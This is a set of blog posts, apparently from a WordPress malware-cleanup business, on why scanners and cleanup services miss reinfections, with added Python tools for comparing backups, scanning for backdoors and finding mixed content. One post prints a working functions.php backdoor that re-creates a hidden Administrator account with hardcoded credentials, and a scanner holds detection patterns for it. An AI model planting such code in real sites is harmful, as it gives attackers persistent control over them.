Wordfence Security Daily Malware Scans Are Not the Way to Clean Up a Malware Infection of a WordPress Website

If your WordPress website has been hacked and contains malware, a common suggestion for cleaning it up is to use the Wordfence Security plugin. There are a number of problems with that. One is that it won’t necessarily catch all of the malware, as someone looking for help with the plugin recently noted:

Hello, I’m using the free version and I’m doing daily scans because my site has malware. At some point the scan did not detect some new folders that had been created in the root folder.

The folders have random characters as a name and contain an index file and a cache folder.

The larger problem with what they were bringing up there is that if the malware had been cleaned up, there wouldn’t be more malware to detect day after day. So something has gone wrong there.

If there is malware on a WordPress website, the focus shouldn’t be on removing the malware, though it does need to be removed. It should be on how it got there, which is something that Wordfence Security can’t determine. When the plugin removes the files without that having been determined, it makes it harder to figure out.

Another important reason for trying to figure out how the website was infected, which we have seen over and over in years of being brought in to re-clean hacked WordPress websites, is that in doing the work to figure out how the website was hacked, you often find malware or other malicious code that otherwise would have been missed.

Figuring out how the malware got there in the first place, or at least stopping it from getting back in, is a basic part of a proper hack cleanup, but it is something that many security providers, including the developer of Wordfence Security, either don’t do or fail to accomplish.

Wordfence Care Failed to Resolve Reoccurring Malware Issue on WordPress Website

When it comes to cleaning up hacked WordPress websites, the most important part of doing that is often not done: trying to figure out how the website was hacked and fixing that. Sometimes you can get away with not doing that; other times the problem is going to come back again and again.

As an example of that, take someone who was recently looking for help with a hacked WordPress website from the developer of the Wordfence Security plugin. They wrote that they had done the following:

Steps I have taken so far:

  1. Scanned my website using a security plugin, but the malware continues to reappear.
  2. Removed wp-links.php, sw.js, index.php, google.json, and the affected plugin files manually from the respective directories.
  3. Checked theme files for suspicious code and removed any identified malicious snippets.
  4. Updated WordPress, themes, and plugins to their latest versions.
  5. Changed all passwords related to my website, including admin, FTP, and database.

But that hadn’t resolved the issue:

Despite these efforts, the malware keeps reappearing, and I’m unable to find the source of the infection.

They rightly understood the need to figure out the source of the infection, which notably is something that many malware cleanup services for WordPress websites don’t do. We know they don’t do that because we are often brought in to re-clean hacked WordPress websites where that wasn’t done before, and doing that work shows that, in addition to not finding the source of the infection, the provider missed parts of the malware currently on the website.

The response from the developer didn’t provide helpful information, but it did promote hiring them to clean up the website. According to the poster, they tried that, getting the Wordfence Care service, but that didn’t help:

I already got the Wordfence Care, but you still can’t give the permanent solution for me.

The results from the more expensive Wordfence Response don’t appear to be better.

WordPress Security Plugins Won’t Fully Disinfect a Hacked WordPress Website

When it comes to cleaning up hacked WordPress websites, there is a lot of advice suggesting solutions that are easy, but don’t properly address the situation. That leads to continuing issues that could have been addressed quickly if handled by a professional like us.

As an example of what not to do, take a recent post from the WordPress Support Forum, where someone claimed to have done a full disinfection of a website, which hadn’t worked:

Despite the fact that we did full disinfections, restored backup files several times, and added strong security systems plus CDNs, Google Search Console and McAfee blocked us from the site, for being malicious, for a long time.

One thing missing there is trying to figure out how the website was hacked. That is important for multiple reasons. One is that if you don’t know how the website was hacked, then you can’t be sure the issue has been addressed and won’t happen again. Another is that if you don’t know how the website was hacked, then you also likely don’t know when it was hacked. Restoring a backup won’t clear out malicious code if the malicious code is in the backup as well.

Another issue is that they were trying to find malicious code using several WordPress security plugins, which didn’t find it:

This code is invisible to the user and to monitoring systems such as Wordfence, iThemes S[ecurity], All-In-One Security (AIOS), and Anti-Malware Security and Brute-Force Firewall. None have detected it.

While they are claiming the code was invisible, their description of it tells a different story:

A function added to the head of a theme’s .js file, which uses a “Get” call and links to an encrypted external link.

It is only shown when loading certain pages in the browser code inside (it is not always shown…)

During a proper cleanup, theme files would be checked. Even before starting on a hack cleanup, a professional should have noticed that the code was being loaded on the website (even though the code it subsequently loaded would only appear in some instances). A professional would have been looking for the code before starting, as people often think that some other issue with a website is a hack, so they want to make sure a hack cleanup is needed before starting.

Automated malware detection doesn’t work well, as it both fails to detect plenty of malicious code (as occurred here) and flags legitimate code as being malicious.

How Another Hacker Was Able to Re-Add a Malicious User to a Hacked WordPress Site

In October, we wrote about how a hacker was able to re-add a malicious user to a hacked WordPress site using a database trigger. That isn’t the only way they can do that, as we found while working on cleaning up a hacked WordPress website recently. In this situation, as soon as a malicious Administrator account was deleted, a new account with the same account information would be created. The cause was code added to the end of the functions.php file for the theme currently in use on the website.

That code was as follows:

add_action( 'init', function () {

    // Hardcoded credentials for the account the code keeps re-creating.
    $username      = 'kshivvamaster';
    $password      = 'Admin@2020';
    $email_address = 'kshivva@gmail.com';

    // On every load, re-create the account if it has been deleted and make it an Administrator.
    if ( ! username_exists( $username ) ) {
        $user_id = wp_create_user( $username, $password, $email_address );
        $user    = new WP_User( $user_id );
        $user->set_role( 'administrator' );
    }

} );

The first line causes the rest of the code to run whenever WordPress loads. The rest of the code checks if the username “kshivvamaster” exists. If it doesn’t, it creates a new account with that username along with the password and email address specified in the code. That account is given the Administrator role.

SiteLock is Still Leaving Websites in a Broken State After Incomplete Malware Removals

It usually isn’t too difficult to properly clean up malware-infected websites, but that doesn’t mean that security companies won’t cut corners. Here is someone recently looking for help after SiteLock had left their website broken after doing a malware removal:

My website was recently hacked. I worked with the domain host and SiteLock to remove the malware. The site is now back, but not functioning properly. The formatting is generic and the menu is gone. Any help would be greatly appreciated.

That isn’t a new problem; it has been going on for years. Despite that, web hosts continue to partner with them because SiteLock pays the web hosts a significant portion of its fees. That probably helps to explain the result, since much of the money being paid for the service isn’t being spent on the work.

If you hire us to remove malware from your website, we will make sure that everything is working again before we even charge you for the work.

You Don’t Need to Start From Scratch if Your WordPress Website is Infected with Malware

When it comes to dealing with a WordPress website that has been infected with malware, sometimes the idea of dealing with it by starting over is suggested. Not only is that not usually necessary, it can sometimes lead you back to where you started: an infected website.

In almost all instances an infected WordPress website can be cleaned up, so unless you are very unlucky and have a website that can’t be cleaned because it is so damaged, the only reason to start over would be that you can’t handle cleaning it yourself or can’t afford to hire someone to properly clean it up (which is not the same as hiring someone to clean it up, based on all the websites we are hired to re-clean after things haven’t been done properly).

A problem with going the route of starting over is that websites don’t just get hacked; something had to have gone wrong security-wise. Starting over isn’t always going to directly deal with that. So if, say, your website was hacked because of an unfixed security vulnerability in a WordPress plugin and you start over and install the plugin on a new WordPress install, then the vulnerability can be exploited again. There are plenty of other issues like that which wouldn’t be resolved by starting over.

Dealing With a Hacked WordPress Website Without a Backup

One question that comes up from time to time when we are brought in to deal with hacked WordPress websites is whether the website can be cleaned up if there isn’t a backup. In almost all situations, the answer is yes, and in fact a backup usually isn’t all that useful for cleaning up the website.

One suggested solution for cleaning up a hacked WordPress website, or a website using other software for that matter, is to revert to a clean backup. The big problem with that is that the backup has to be clean; reverting to a backup from when the website was already hacked won’t solve the problem. Since a hack can have started well before it is noticed, simply reverting to a backup from before you were aware the website was hacked isn’t always going to do the trick. And by the time it has been figured out when the website was originally hacked, most of the work needed to clean up the website without a backup has likely already been done.

The work needed to clean up the website without a backup can also be important for determining how the website was hacked. If you don’t figure out how the website was hacked, then you can’t ensure it won’t get hacked again because of the same issue. (Surprisingly, a lot of hack cleanup providers that claim to have expertise in dealing with hacked websites don’t even try to figure out how websites have been hacked, leading to far too many of their customers’ websites getting hacked again.)

Another issue with reverting to a backup is that you need to do the reversion correctly. Done incorrectly, files that were part of the hack could still be on the website, or the website could be broken (sometimes in a way that is only realized later).

The exception to being able to do a cleanup without a backup would be if the files or data have been deleted or are damaged beyond repair, which in almost all instances isn’t the case.
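One practical way to check the point made above, that a backup is only useful if it is actually clean, is to hash every file in the backup and in the live site and see whether the files identified as part of the hack are also present, unchanged, in the backup. The following is an added example written for this page, not code from the original post or from any cleanup provider; the directory layout, the file names it builds in a temporary directory and the list of “known bad” paths are all constructed for the demonstration (the names wp-links.php and sw.js are taken from the poster’s list earlier on the page).

```python
import hashlib
import tempfile
from pathlib import Path


def _hash_tree(root: Path) -> dict:
    """Map each file's path (relative to root, with / separators) to the SHA-256 of its bytes."""
    hashes = {}
    for path in sorted(p for p in root.rglob("*") if p.is_file()):
        rel = str(path.relative_to(root)).replace("\\", "/")
        hashes[rel] = hashlib.sha256(path.read_bytes()).hexdigest()
    return hashes


def compare_trees(backup_root: Path, live_root: Path) -> dict:
    """Sort files into: only in the live site, only in the backup, changed, or byte-identical."""
    backup, live = _hash_tree(backup_root), _hash_tree(live_root)
    both = backup.keys() & live.keys()
    return {
        "only_in_live": sorted(live.keys() - backup.keys()),
        "only_in_backup": sorted(backup.keys() - live.keys()),
        "changed": sorted(p for p in both if backup[p] != live[p]),
        "identical": sorted(p for p in both if backup[p] == live[p]),
    }


def assess_backup(comparison: dict, known_bad: list) -> dict:
    """Given paths already identified as part of the hack on the live site, report
    which of them the backup also contains unchanged (backup is not clean), which it
    contains in a different form (could be the clean original or an earlier stage of
    the hack, so it needs review), and which it does not contain at all."""
    identical, changed = set(comparison["identical"]), set(comparison["changed"])
    return {
        "contaminated": sorted(p for p in known_bad if p in identical),
        "needs_review": sorted(p for p in known_bad if p in changed),
        "absent_from_backup": sorted(p for p in known_bad if p not in identical and p not in changed),
    }


def _write(root: Path, rel: str, text: str) -> None:
    path = root / rel
    path.parent.mkdir(parents=True, exist_ok=True)
    path.write_text(text, encoding="utf-8")


def demo() -> tuple:
    """Build a constructed backup and live tree in a temp directory and assess them."""
    with tempfile.TemporaryDirectory() as tmp:
        backup, live = Path(tmp) / "backup", Path(tmp) / "live"
        theme_functions = "wp-content/themes/sample/functions.php"
        clean_functions = "<?php\n// theme setup (constructed sample)\n"
        # Shared, unchanged core file.
        for root in (backup, live):
            _write(root, "index.php", "<?php\nrequire __DIR__ . '/wp-blog-header.php';\n")
        # The backup already holds the same dropped file as the live site: it is not clean.
        for root in (backup, live):
            _write(root, "wp-links.php", "<?php\n/* constructed stand-in for a dropped file */\n")
        # The theme file differs between the two: backup has the clean version.
        _write(backup, theme_functions, clean_functions)
        _write(live, theme_functions, clean_functions + "// constructed stand-in for an appended tail\n")
        # A file that exists only on the live site.
        _write(live, "sw.js", "/* constructed stand-in */\n")
        comparison = compare_trees(backup, live)
        known_bad = ["wp-links.php", theme_functions, "sw.js"]
        return comparison, assess_backup(comparison, known_bad)


if __name__ == "__main__":
    comparison, verdict = demo()
    for key, paths in comparison.items():
        print(f"{key}: {paths}")
    print("backup assessment:", verdict)
```

The useful output is the “contaminated” list: any entry there means the backup was taken after the hack started, so restoring it would put the same file straight back, which is exactly the failure mode described above.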

The Likely Reason Malware Keeps Returning to Your WordPress Website

One question that comes up from time to time when dealing with malware-infected WordPress websites is why malware keeps returning to the website. While there are multiple reasons that can occur, what we find most often with websites that keep getting infected, WordPress or otherwise, is that they haven’t actually been infected more than once. Instead, the original issue was never fully resolved.

While some malware can be difficult to fully remove, in most cases what we find is that corners were cut during the cleanup process. That isn’t just an issue with hiring someone who doesn’t have much experience with malware-infected websites, as we have often been brought in to re-remove malware from websites where supposedly reputable providers had done the previous cleanup. That includes companies that are frequently promoted by journalists, despite what they are covering itself being a pretty big warning that something is amiss with the company.

To properly clean up malware on a website, there are three key components:

  • Removing the malware.
  • Getting the website as secured as possible (which usually involves getting any software on the website up to date).
  • Trying to determine how the website was infected and fix that.

If a company’s marketing material doesn’t focus on those, then there is a good chance they are cutting corners. You might get lucky and not experience the downside of that, but if you are like the many people who hire us after having hired someone else, you end up paying more and dealing with more problems than if you had just hired us to remove it in the first place.

index.php Files with the Comment “Silence is golden.” on a WordPress Website Are Not Malware

When it comes to dealing with hacked websites, a lot of people would be best off leaving it to professionals (assuming you can find one among all the unqualified companies), as it is easy to get very confused about what is going on. We recently had someone contact us about cleaning up a hacked WordPress website who said that part of the malware was that index.php files had been corrupted so that they contained “Silence is golden.” and nothing else.

What they were referring to are files that come with WordPress and have the following contents:

<?php
// Silence is golden.

The purpose of those files is to make sure that a listing of the files in the directory in which they are located is not shown under certain server configurations. So those files are harmless and not in any way malware.
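The two file-level judgements made on this page, that the stock “Silence is golden.” index.php is harmless, and that a theme functions.php tail which hooks user creation and the administrator role into a WordPress load hook is the persistence mechanism described in the earlier section, can be turned into a small triage scan. The following is an added example written for this page, not code from the original post or from WordPress, Wordfence or any other product. It scans a WordPress tree for .php files, whitelists the exact stock stub, and flags files that combine a load-time hook with wp_create_user/wp_insert_user and set_role('administrator'). The sample files it builds in a temporary directory are constructed for the demonstration (the persistence sample is modelled on the page’s snippet but uses placeholder credentials), and the hook names beyond init are an assumption about where such code could equally be attached.

```python
import re
import tempfile
from pathlib import Path

# Contents of the stock WordPress placeholder index.php: an open tag plus the
# "Silence is golden." comment. It is harmless and must not be flagged.
STOCK_SILENCE_STUB = "<?php\n// Silence is golden.\n"

# Patterns for the persistence shown earlier on the page: a hook that fires on
# every load, wrapped around user creation and assignment of the administrator role.
# Hooks other than 'init' are assumed equivalents, not something the page showed.
HOOK_RE = re.compile(r"add_action\s*\(\s*['\"](?:init|wp_loaded|plugins_loaded|admin_init)['\"]", re.I)
USER_CREATE_RE = re.compile(r"\b(?:wp_create_user|wp_insert_user)\s*\(", re.I)
ADMIN_ROLE_RE = re.compile(r"(?:set_role|add_role)\s*\(\s*['\"]administrator['\"]", re.I)


def _normalize(source: str) -> str:
    """Drop line-ending differences, indentation and blank lines so a stock stub
    saved with CRLF endings or a trailing blank line still compares equal."""
    lines = [line.strip() for line in source.replace("\r\n", "\n").splitlines()]
    return "\n".join(line for line in lines if line)


def classify_php(source: str) -> str:
    """Classify one PHP file's contents.

    'stock-stub'                  exact stock placeholder; safe to ignore
    'suspicious-user-persistence' load hook + user creation + administrator role
    'suspicious-admin-creation'   user creation + administrator role, no hook seen
    'unclassified'                nothing matched; still gets the usual manual review
    """
    if _normalize(source) == _normalize(STOCK_SILENCE_STUB):
        return "stock-stub"
    creates_admin = bool(USER_CREATE_RE.search(source) and ADMIN_ROLE_RE.search(source))
    if creates_admin and HOOK_RE.search(source):
        return "suspicious-user-persistence"
    if creates_admin:
        return "suspicious-admin-creation"
    return "unclassified"


def scan_tree(root: Path) -> dict:
    """Return {relative path: classification} for every .php file under root
    that is not 'unclassified'. Core, theme and plugin files are all covered."""
    results = {}
    for path in sorted(root.rglob("*.php")):
        label = classify_php(path.read_text(encoding="utf-8", errors="replace"))
        if label != "unclassified":
            results[str(path.relative_to(root)).replace("\\", "/")] = label
    return results


# Constructed sample modelled on the page's functions.php tail, with placeholder
# credentials instead of the real ones.
SAMPLE_PERSISTENCE = """<?php
add_action( 'init', function () {
    $username      = 'placeholder_user';
    $password      = 'placeholder_password';
    $email_address = 'placeholder@example.invalid';
    if ( ! username_exists( $username ) ) {
        $user_id = wp_create_user( $username, $password, $email_address );
        $user    = new WP_User( $user_id );
        $user->set_role( 'administrator' );
    }
} );
"""

# Constructed benign theme code: uses a hook but creates no users.
SAMPLE_BENIGN = (
    "<?php\nfunction sample_theme_setup() { add_theme_support( 'title-tag' ); }\n"
    "add_action( 'after_setup_theme', 'sample_theme_setup' );\n"
)


def demo() -> dict:
    """Write the three constructed files into a throwaway tree and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "wp-content/themes/sample").mkdir(parents=True)
        (root / "wp-content/plugins").mkdir(parents=True)
        (root / "wp-content/themes/sample/functions.php").write_text(SAMPLE_PERSISTENCE)
        (root / "wp-content/themes/sample/benign.php").write_text(SAMPLE_BENIGN)
        (root / "wp-content/plugins/index.php").write_text("<?php\n// Silence is golden.\n")
        return scan_tree(root)


if __name__ == "__main__":
    for rel, label in demo().items():
        print(f"{label:30} {rel}")
```

A match from this scan is a starting point for review, not a verdict, and a clean result says nothing about code the patterns do not cover; the value here is the other direction: not spending time on the stock stub, and not deleting a re-created account without also removing whatever re-creates it.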

Is the “Insecure content blocked: the page is trying to load scripts from unauthenticated sources.” message related to malware or another hack?

We recently had someone contact us looking for a cleanup of a hacked website due to the Chrome web browser displaying the message “Insecure content blocked: the page is trying to load scripts from unauthenticated sources.” when visiting their website, which they thought was caused by malware on the website. It was good that they contacted us and not one of the many unscrupulous security companies out there, as instead of taking people’s money before even knowing if our service is really needed, we actually make sure the website is hacked first (when there is a real hack, we don’t charge until the work on the cleanup is completed).

In this case the website wasn’t hacked. Instead, it was simply a case where some of the URLs for content on the page used HTTP even when the pages of the website were requested over HTTPS, which creates a minor security issue, hence the warning.

What is important to note, though, is that this type of situation could be caused by malware, as a hacker could have added HTML code to the website’s pages that causes requests for malicious content over HTTP even when the pages are served over HTTPS. So if you start seeing the warning without having changed anything on the website, a hack could be the cause of the message.
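To tell the harmless case apart from the hacked one, the first step is to list exactly which subresources on the page are requested over plain HTTP and where they point: references to your own hostname are usually leftover hardcoded URLs from before the site moved to HTTPS, whereas a plain-HTTP script from a host you do not recognise is the kind of injected reference the paragraph above describes. The following is an added example written for this page, not code from the original post or from any browser or plugin; the sample page and the hostnames in it (on the reserved .invalid TLD) are constructed for the demonstration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Tags that make the browser fetch a subresource, and the attribute holding the URL.
FETCH_ATTRS = {
    "script": "src", "iframe": "src", "img": "src",
    "source": "src", "video": "src", "audio": "src", "link": "href",
}
# Active mixed content (scripts, frames, stylesheets) is what the browser refuses
# to load and reports with the message quoted above; images and media are passive.
ACTIVE_TAGS = {"script", "iframe", "link"}


class MixedContentFinder(HTMLParser):
    """Collect every subresource reference whose URL scheme is plain http."""

    def __init__(self, site_host: str):
        super().__init__()
        self.site_host = site_host.lower()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        attr_name = FETCH_ATTRS.get(tag)
        if attr_name is None:
            return
        attrs = dict(attrs)
        if tag == "link" and "stylesheet" not in (attrs.get("rel") or "").lower():
            return  # only stylesheet links are fetched as active content
        url = (attrs.get(attr_name) or "").strip()
        parsed = urlparse(url)
        if parsed.scheme.lower() != "http":
            return  # https, protocol-relative (//host/...) and relative URLs inherit HTTPS
        host = (parsed.hostname or "").lower()
        self.findings.append({
            "tag": tag,
            "url": url,
            "active": tag in ACTIVE_TAGS,
            "external": host != self.site_host,
        })


def find_mixed_content(html: str, site_host: str) -> list:
    finder = MixedContentFinder(site_host)
    finder.feed(html)
    finder.close()
    return finder.findings


def summarize(html: str, site_host: str) -> dict:
    """Group plain-HTTP references by how much attention they deserve."""
    findings = find_mixed_content(html, site_host)
    return {
        # Blocked by the browser AND pointing somewhere else: review these first.
        "external_active": [f["url"] for f in findings if f["active"] and f["external"]],
        # Blocked, but on the site's own host: typically hardcoded pre-HTTPS URLs.
        "same_host_active": [f["url"] for f in findings if f["active"] and not f["external"]],
        # Images and media: a warning rather than a block.
        "passive": [f["url"] for f in findings if not f["active"]],
    }


# Constructed sample page; hostnames use the reserved .invalid TLD.
SAMPLE_PAGE = """<!doctype html>
<html><head>
<link rel="stylesheet" href="https://www.example.invalid/wp-content/themes/sample/style.css">
<script src="http://www.example.invalid/wp-includes/js/jquery.js"></script>
<script src="http://cdn.third-party.invalid/loader.js"></script>
<script src="//cdn.third-party.invalid/ok.js"></script>
</head><body>
<img src="http://www.example.invalid/wp-content/uploads/logo.png">
<img src="/wp-content/uploads/relative.png">
<iframe src="https://video.example.invalid/embed"></iframe>
</body></html>
"""

if __name__ == "__main__":
    for group, urls in summarize(SAMPLE_PAGE, "www.example.invalid").items():
        print(f"{group}:")
        for url in urls:
            print(f"  {url}")
```

Run it against the saved HTML of a page that shows the warning (the source as served, since injected references can be added server-side) and compare the “external_active” list against the services the site is known to use; anything unexplained there is worth tracing back to the template, plugin or database row that emits it.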

The important takeaway from this is that you want to make sure to confirm that your website is hacked before hiring someone to clean it. If a company is interested in taking your money before even confirming it is hacked, they probably don’t have your best interest at heart, which, based on our years of experience being brought in to deal with the results of others improperly handling hacked websites, could leave you with even more problems than the initial hack.